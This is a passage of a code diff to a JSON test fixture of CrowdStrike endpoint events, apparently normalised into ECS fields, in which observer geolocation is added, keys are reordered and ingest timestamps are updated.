"{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", "created": "2021-07-07T17:05:33.060Z", "kind": "event", @@ -3877,22 +4408,22 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:48.827Z", "file": { @@ -3902,6 +4433,9 @@ "type": "file", "directory": "/Users/user5/.rbenv/versions/2.6.5/bin" }, + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -3918,7 +4452,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150899200Z", + "ingested": "2021-12-14T14:41:26.533770666Z", "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:48.827Z", "kind": "event", @@ -4062,21 +4596,33 @@ "30803505447584" ], "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:13.146Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -4091,9 +4637,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { "action": "LightningLatencyInfo", - "ingested": "2021-12-09T13:36:11.150905600Z", + "ingested": "2021-12-14T14:41:26.533771059Z", "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:13.146Z" @@ -4115,17 +4664,23 @@ }, { "observer": { - "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:10.083Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -4140,8 +4695,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150911900Z", + "ingested": "2021-12-14T14:41:26.533771442Z", "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:10.083Z", "kind": "state", @@ -4223,12 +4781,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2d984e32b702789b54f0f811", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2d984e32b702789b54f0f811", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:14.557Z", "file": { @@ -4254,7 +4821,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150918200Z", + "ingested": "2021-12-14T14:41:26.533772326Z", "original": "{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", "created": "2021-07-07T17:04:14.723Z", "kind": "event", @@ -4287,12 +4854,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.24.13701.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "6.24.13701.0" }, "@timestamp": "2021-07-07T17:04:05.731Z", "file": { @@ -4319,7 +4895,7 @@ "hostname": "comp2" }, "event": { - "ingested": "2021-12-09T13:36:11.150924500Z", + "ingested": "2021-12-14T14:41:26.533772768Z", "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", "created": "2021-07-07T17:04:20.451Z", "kind": "state", @@ -4385,12 +4961,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:58.515Z", "file": { @@ -4415,7 +5000,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150930800Z", + "ingested": "2021-12-14T14:41:26.533773165Z", "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", "created": "2021-07-07T17:03:58.553Z", "kind": "alert", @@ -4446,18 +5031,23 @@ }, { "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.24.13701.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "6.24.13701.0" }, "@timestamp": "2021-07-07T17:04:22.356Z", - "os": { - "type": "macos", - "version": "Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64" - }, "ecs": { "version": "1.12.0" }, @@ -4472,8 +5062,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos", + "version": "Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64" + }, "event": { - "ingested": "2021-12-09T13:36:11.150937Z", + "ingested": "2021-12-14T14:41:26.533773564Z", "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:22.356Z", "kind": "event", @@ -4509,17 +5103,23 @@ }, { "observer": { - "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "type": "agent", + "version": "1007.8.0010912.1" }, "@timestamp": "2021-07-07T17:03:56.454Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -4534,8 +5134,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150943400Z", + "ingested": "2021-12-14T14:41:26.533773963Z", "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:56.454Z", "kind": "event", @@ -4604,12 +5207,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:02:45.906Z", "file": { @@ -4631,7 +5243,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150949700Z", + "ingested": "2021-12-14T14:41:26.533774355Z", "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", "created": "2021-07-07T17:02:45.906Z", "kind": "event", @@ -4670,12 +5282,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:33.633Z", "file": { @@ -4701,7 +5322,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150955900Z", + "ingested": "2021-12-14T14:41:26.533774771Z", "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", "created": "2021-07-07T17:02:33.895Z", "kind": "event", @@ -4725,17 +5346,23 @@ }, { "observer": { - "serial_number": "ffffffff2977460db2898ece881a9358", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2977460db2898ece881a9358", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:30.466Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -4750,8 +5377,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150962300Z", + "ingested": "2021-12-14T14:41:26.533775153Z", "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:30.466Z", "kind": "event", @@ -4817,12 +5447,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:25.235Z", "file": { @@ -4844,7 +5483,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150968600Z", + "ingested": "2021-12-14T14:41:26.533775543Z", "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", "created": "2021-07-07T17:05:25.235Z", "kind": "event", @@ -4885,12 +5524,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffff1a64286a233d09974b1b377", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffff1a64286a233d09974b1b377", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:42.148Z", "file": { @@ -4914,7 +5562,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150974900Z", + "ingested": "2021-12-14T14:41:26.533775937Z", "original": "{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", "created": "2021-07-07T17:04:42.403Z", "kind": "event", @@ -4939,6 +5587,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffffdd094539a02b394c69a70aaf", + "type": "agent", + "version": "1007.8.0010912.1" + }, "process": { "entity_id": "130732827553316", "pid": 76482, @@ -4946,24 +5611,10 @@ "id": 0 } }, + "@timestamp": "2021-07-07T17:05:10.959Z", "os": { "type": "linux" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffdd094539a02b394c69a70aaf", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:10.959Z", "ecs": { "version": "1.12.0" }, @@ -4979,7 +5630,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150981100Z", + "ingested": "2021-12-14T14:41:26.533776325Z", "original": 